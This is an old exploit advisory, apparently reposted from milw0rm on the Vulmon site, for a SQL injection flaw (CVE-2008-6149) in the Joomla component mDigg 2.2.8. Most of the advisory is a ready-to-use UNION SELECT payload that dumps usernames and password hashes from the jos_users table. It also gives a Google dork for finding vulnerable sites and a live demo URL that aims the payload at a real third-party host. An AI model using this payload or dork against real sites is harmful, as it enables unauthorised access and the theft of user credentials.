Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2008-6149

Publish Date: 24 Dec 2008

                							

                #############################################################
Joomla Component com_mdigg(category) SQL-injection vulnerability
#############################################################


###################################################
#[~] Author        :  boom3rang 
#[~] Greetz        :  H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[~] Vulnerability :  SQL injection 
#[~] Google Dork   :  inurl:com_mdigg 
--------------------------------------------------
#[!] Name          :  mdigg
#[!] CreationDate  :  10-12-2007
#[!] Author        :  Zhigang Lei
#[!] AuthorEmail   :  zhigang.lei@gmail.com 
#[!] Version       :  2.2.8 
###################################################

Example:
http://localHost/path/index.php?option=com_mdigg&amp;act=story_lists&amp;task=view&amp;category=[exploit]


Exploit:
-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*


LiveDEMO:
http://demo15.joomlaapps.com/index.php?option=com_mdigg&amp;act=story_lists&amp;task=view&amp;category=-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*

##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2008-12-24]

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Joomla! Component mDigg 2.2.8 - 'category' SQL Injection

Vulmon Search

About

Products

Connect